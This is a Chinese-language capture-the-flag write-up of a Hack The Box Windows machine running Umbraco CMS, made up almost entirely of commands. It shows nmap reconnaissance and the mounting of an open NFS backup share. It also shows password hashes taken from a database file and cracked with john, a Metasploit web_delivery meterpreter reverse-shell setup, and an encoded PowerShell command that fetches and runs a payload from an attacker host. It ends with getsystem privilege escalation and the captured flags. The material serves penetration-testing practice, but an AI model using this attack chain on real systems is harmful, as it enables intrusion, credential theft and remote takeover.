sudo nmap -Pn -p- -v 10.129.95.194
sudo nmap -Pn -sS -sV -A -v -p21,80,111,135,445,2049,49666 10.129.95.194
ftp匿名访问
登录页面http://10.129.95.194/umbraco/#/login
搜索此CMS漏洞
https://github.com/noraj/Umbraco-RCE
查看所需参数
需要账号密码
查看mount挂载
查看能挂载内容 showmount -e 10.129.95.194
可以挂载出 /site_backups目录,并且每个人都可以访问
挂载到本地查看 sudo mount -t nfs 10.129.95.194:/site_backups ./test
.sdf文件是标准的数据库格式文件。
尝试使用 strings打开
admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa
smith@htb.local jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=
使用john破解
admin@htb.local baconandcheese
尝试登录
尝试使用脚本
成功执行命令
反弹shell
使用Metasploit中的web_delivery制作一个脚本。我们从这里复制生成的漏洞代码。(无文件落地)
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.6
set srvhost 10.10.16.6
set srvport 8080
run
运行:
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.129.95.194 -c powershell.exe -a 'powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABrAGMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAawBjAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAawBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4ANgA6ADgAMAA4ADAALwBNAFgAbABQAGkASAB3AGMAWgBvAE4ATwB2AGsALwBRAHUAUwAzAGcAQQB3AGwAdQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4ANgA6ADgAMAA4ADAALwBNAFgAbABQAGkASAB3AGMAWgBvAE4ATwB2AGsAJwApACkAOwA=';
成功获取shell
查看用户权限
whoami /priv
获取普通用户flag
fe36c86bc163fd028710e57b2d98f6f8
meterpreter getsystem
获取管理员flag
2f535d928cd95075403281b237301b05
参考文章 https://blog.csdn.net/weixin_45527786/article/details/112291073